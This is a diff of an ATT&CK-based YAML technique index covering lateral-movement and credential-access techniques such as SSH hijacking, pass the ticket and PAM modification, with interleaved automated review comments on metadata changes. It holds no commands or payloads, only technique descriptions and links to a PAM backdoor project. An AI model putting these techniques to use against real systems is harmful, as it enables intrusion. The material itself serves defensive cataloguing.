url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests:
- name: Enable Apple Remote Desktop Agent
@@ -46581,7 +47269,7 @@ lateral-movement:
elevation_required: true
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
@@ -46606,11 +47294,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -46633,9 +47321,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -46686,7 +47373,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -46750,7 +47436,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -46821,7 +47506,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -46858,7 +47542,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -46889,8 +47573,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
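Review bot: For T1563.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted without a replacement `x_mitre_attack_spec_version`, whereas the other hunks in this diff bump `3.1.0` to `3.2.0` or keep `3.2.0`; the same pattern occurs for T1602.001 above, where `x_mitre_attack_spec_version: 2.1.0` is also removed outright. Together with the regressed `modified` timestamps on those two entries this suggests they were generated from an older source object, and they should probably end up with `x_mitre_attack_spec_version: 3.2.0` like the rest of the file.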
@@ -46973,12 +47655,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -47005,6 +47686,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -47022,12 +47704,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -47053,14 +47735,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -47178,7 +47859,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -47232,11 +47912,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -47288,14 +47967,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -47381,12 +48059,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -47406,6 +48083,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -47413,7 +48091,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
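Review bot: the `- x_mitre_modified_by_ref` removal in this hunk is a move, not a deletion; the same key and value reappear later in the T1550.003 object (`+ x_mitre_modified_by_ref: identity--c78cb6e5-...` next to the `x_mitre_attack_spec_version: 3.2.0` bump). Worth confirming rather than assuming, because the surrounding hunks for this object also drop `spec_version` outright, so a missing key is easy to miss in the noise.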
@@ -47429,39 +48106,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
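Review bot: the external_references reorder in this hunk is deterministic, not churn: the new order (Abolins, Campbell, Deply, Metcalf, Warren) is alphabetical by the first author in `description`, and the T1556.003 and T1555.001 objects later in the diff are reordered the same way. The only substantive changes are the GentilKiwi entry, whose `url` now points at a web.archive.org snapshot with Retrieved date September 12, 2024, and the `x_mitre_attack_spec_version` bump to 3.2.0 with `x_mitre_modified_by_ref` re-added. Note that `x_mitre_version: '1.1'` is unchanged even though `modified` moved to 2024-09-12; that is expected for a reference-only edit.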
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -47486,12 +48164,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -47505,13 +48182,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -47528,7 +48204,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
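Review bot: the `Azure AD` to `Entra ID` rename is correctly confined to the prose; the citation key `(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)` is left as-is, which it must be, because it has to match the `source_name` of the corresponding external_references entry. Do not "fix" the citation text to Entra ID in a follow-up.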
@@ -47576,7 +48252,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -47609,7 +48285,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -47648,7 +48323,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
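Review bot: the `modified` timestamp for T1210 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-02-24T15:06:46.006Z`, while every other `modified` change in this diff moves forward into 2024. A regression like this usually means the object was sourced from a different or stale copy of the technique than the rest of the index; check the generator's input for T1210 before merging, since the next hunk for the same object also loses a field the other techniques keep.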
@@ -47682,12 +48357,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
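Review bot: this hunk removes `- x_mitre_attack_spec_version: 2.1.0` from T1210 without adding a replacement, whereas the other objects in this diff either keep the key or bump it to 3.2.0 (T1021.006, T1550.003, T1021.007, T1550.004, T1003.002, T1552.005, T1110.002). After this change T1210 is the one technique here with no attack-spec version at all. Together with the backwards `modified` date in the previous hunk, this points at a source mismatch; regenerate T1210 from the same dataset as the rest.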
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -47715,10 +48388,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -47748,7 +48420,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -47810,12 +48481,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -47839,11 +48509,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -47868,9 +48537,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -47930,7 +48598,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -47985,7 +48652,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -48053,12 +48719,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -48115,6 +48780,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -48125,13 +48791,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -48190,7 +48855,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -48284,49 +48948,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -48341,20 +48966,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
